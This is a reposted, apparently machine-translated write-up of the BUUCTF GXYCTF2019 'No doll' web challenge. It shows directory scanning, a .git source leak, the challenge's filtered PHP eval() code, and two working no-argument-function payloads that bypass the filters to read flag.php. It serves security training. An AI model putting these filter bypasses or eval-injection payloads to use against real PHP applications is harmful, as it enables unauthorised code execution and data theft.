当前位置:网站首页>Buuctf Web [gxyctf2019] no dolls

Buuctf Web [gxyctf2019] no dolls

2022-04-23 12:33:00 Y1Daa

BUUCTF WEB [GXYCTF2019] No doll

  • There's no hint , Use dirsearch scanning 

    # Dirsearch started Fri Apr 22 02:23:09 2022 as: ./dirsearch.py -u http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/ --delay=0.5 -t 3

301   185B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git    -> REDIRECTS TO: http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn/.git/
403   571B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/
200   267B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/COMMIT_EDITMSG
200    23B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/HEAD
403   571B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/branches/
200    92B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/config
200    73B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/description
403   571B   http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/.git/hooks/
......

    Scan a lot about .git Path to folder , The suspicion is .git Let the cat out of the

  • Use scrabble scanning 

    ./scrabble http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint: 
hint:   git config --global init.defaultBranch <name>
hint: 
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint: 
hint:   git branch -m <name>
Initialized empty Git repository in /root/Tools/scrabble/.git/
parseCommit e729e0b15f06da388b0e634afffd19b8e17b572a
downloadBlob e729e0b15f06da388b0e634afffd19b8e17b572a
parseTree 964071070547c4dda8cf5e14da26e4d7b7aeeeb5
downloadBlob 964071070547c4dda8cf5e14da26e4d7b7aeeeb5
downloadBlob 7169422bf0676b5369d25776f03961e158428c90
HEAD is now at e729e0b init

    Scan it. index.php

    <?php
include "flag.php";
echo "flag Where is it ?<br>";
if(isset($_GET['exp'])){
      
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
      
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
      
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
      
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
      
                die(" It's a little bit close to !");
            }
        }
        else{
      
            die(" Think about it !");
        }
    }
    else{
      
        die(" Still want to read flag, Smelly brother !");
    }
}
// highlight_file(__FILE__);
?>

  • The first layer of filtration 

    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp']))

    Filtered some PHP Fake protocol

  • Second layer filtration 

    if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))

    there (?R) It refers to the current expression ,(?R)? Indicates that there can be zero or one reference , Can match 

    print(echo(1))

    A string consisting of nested characters and parentheses

  • The third layer of filtration 

    if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']))

    Filtered some keywords

Method 1 session_id

?exp=highlight_file(session_id(session_start()));

Grab the bag at the same time Cookie Set in PHPSESSID

PHPSESSID=flag.php

Method 2 scandir()

exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

current(localeconv()) Returns the ., And then use scandir() Function to scan the current folder

localeconv() The function returns an array containing local numbers and currency format information , The first element of this array is .

current() Function returns the value of the current element in the array , The initial pointer of each array points to the first element of the array

array_reverse() The function returns the array in reverse order

next() The function points the internal pointer to the next element in the array and outputs

版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231227159509.html

边栏推荐

猜你喜欢

随机推荐